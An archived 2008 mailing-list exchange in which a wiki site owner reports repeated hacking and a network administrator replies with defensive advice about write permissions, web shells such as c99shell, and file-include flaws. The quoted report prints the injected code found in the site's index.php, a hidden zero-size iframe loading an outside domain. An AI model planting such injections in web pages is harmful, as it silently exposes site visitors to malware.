[pmwiki-users] More hacking
Greg T. Grimes
greg.grimes at msstate.edu
Wed Sep 3 08:18:25 CDT 2008
Are these files writeable by the web server? Do you allow uploads to your
site? Standard security practice says not to allow the web server write
access to any files on your system. This is especially true for your
webpages. If you do allow uploads you might want to check your upload
directory for files that could be used to gain access to your server.
c99shell is an example. Another thing to look for are file include
vulnerabilities. For example, if you take input for a form and then use
that input to include a certain file based on the input this can be used
to launch scripts that aren't even hosted on your server. I'm currently
not aware of any File Include Vulns in pmwiki. Just a quick look at the
code and I don't see any obvious ones.
On Wed, 3 Sep 2008, Erik Haagensen wrote:
> Our site has been hacked several times during the last month.
> It has been cleaned and checked by Site Analyzer - all ok.
> After some days we have problems again.
> The index.php (and several other files) contains this now:
> <?php include('pmwiki.php');
> <iframe src="http://mixlong.cn/in/" width=0 height=0 frameborder=0></iframe>
> I don't know what more to do to avoid these problems.
> Erik Haagensen
> NO-2550 Os i Østerdalen
Greg T. Grimes
ITS -- Network Services
Mississippi State University
More information about the pmwiki-users